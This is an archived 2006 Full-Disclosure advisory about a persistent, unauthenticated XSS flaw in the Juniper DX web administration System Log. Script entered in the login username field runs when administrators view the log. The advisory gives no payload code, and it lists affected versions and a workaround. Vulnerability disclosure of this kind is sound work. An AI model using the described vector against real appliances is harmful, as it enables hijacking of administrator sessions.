lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <26563eca0607100916y7c87aeehe778996722abd0c5@mail.gmail.com>
Date: Mon, 10 Jul 2006 12:16:09 -0400
From: "Darren Bounds" <dbounds@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Juniper Networks DX Web Administration Persistent
	System Log XSS Vulnerability


Juniper Networks DX Web Administration Persistent System Log  XSS Vulnerability
July 10, 2006

Product Overview:
The Juniper Networks (Redline) DX application acceleration platform
delivers a complete data center acceleration solution for web-enabled
and IP-based business applications.

Vulnerability Details:
The Juniper Networks DX System log is vulnerable to a persistent,
unauthenticated XSS attack. This vulnerability can be exploited by an
attacker to obtain full administrative access to the Juniper DX appliance.

This vulnerability stems from failure to sanitize System log content
within the web administration interface. A malicious user may insert
content into the username login field which will then be executed by
administrative users when viewing the System Log.

Affected Versions:
Juniper DX 5.1.x
Olders versions may also be affected.

Workarounds:
Control network access to the DX web administration console.

References:
http://www.juniper.net/products/appaccel/dca/dx.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ